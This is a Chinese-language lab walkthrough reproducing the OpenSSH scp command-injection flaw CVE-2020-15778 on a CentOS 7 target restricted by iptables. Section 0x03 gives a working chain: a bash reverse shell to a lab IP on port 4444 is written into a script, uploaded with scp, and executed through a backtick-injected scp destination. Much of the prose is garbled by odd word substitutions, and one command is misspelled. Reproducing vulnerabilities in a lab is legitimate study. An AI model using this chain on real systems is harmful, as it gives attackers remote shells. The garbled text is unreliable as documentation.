OpenSSH 命令注入漏洞（CVE-2020-15778）

0x00 缝隙介绍

CVE编号：CVE-2020-15778

发布时间：2020-07-24

损害等级：高危

缝隙版别：<= openssh-8.3p1

缝隙描绘：OpenSSH 8.3p1及之前版别中的scp的scp.c文件存在操作系统指令注入缝隙。该缝隙即便在禁用ssh登录的情况下，但是答应运用scp传文件，而且长途服务器答应运用反引号(`)，可利用scp仿制文件到长途服务器时，履行带有payload的scp指令，然后在后续利用中getshell。

利用条件：知道目标的ssh暗码

0x01 模拟场景

设置iptables策略模拟仅答应运用scp的场景，让该缝隙在特殊环境下实现指令注入。

0x02 试验场景布置

靶机环境：Centos 7

渗透机环境：Kali 2019版别

1、查看ssh版别

ssh -V

测验为缝隙存在版别。

2、测验ssh与scp在正常情况下的运用情况。

能够正常运用。

3、履行ervice iptables status 查看是否装置iptables，若已装置IP tables，可跳过第三步。

（1）装置iptables

yum install -y iptables 

（2）装置iptables-services

yum install iptables-services 

（3）centOS7默许自带firewalld

先停止firewalld服务 
systemctl stop firewalld
禁用firewalld服务 
systemctl mask firewalld  

（4）查看现有规矩

iptables -L -vn

iptables -F是清空默许规矩

iptables -L -n --line-number 显现规矩和相对应的编号

4、在Centos中设置iptables策略，禁用ssh长途连接，但敞开scp。

指令：

service iptables start
iptables -t filter -A INPUT -p tcp --dport 22 -m tos --tos 0x10 -j DROP
service iptables save
iptables -L -n --line-number 

5、测验ssh与scp在已设置iptables策略下的运用情况。

0x03 SSH指令注入缝隙复现

1、在kali创立一个1.sh文件，并写入一个反弹shell的bash指令。

bash -i >& /dev/tcp/192.168.207.156/4444 0>&1

2、运用scp指令，把该文件上传到靶机的/tmp下

3、在新建的指令行页面中输入指令：

4、运用POC，长途履行指令。

scp 1.sh [email protected]:'`sh /tmp/1.sh`'

5、能够看到，在输完暗码后，稍等一会就已经成功反弹了shell，试验结束。

0x04 缝隙防护

1、先确保ssh暗码没有泄露，等一波openssh的新版别吧

2、升级ssh版别

3、等待厂商发布补丁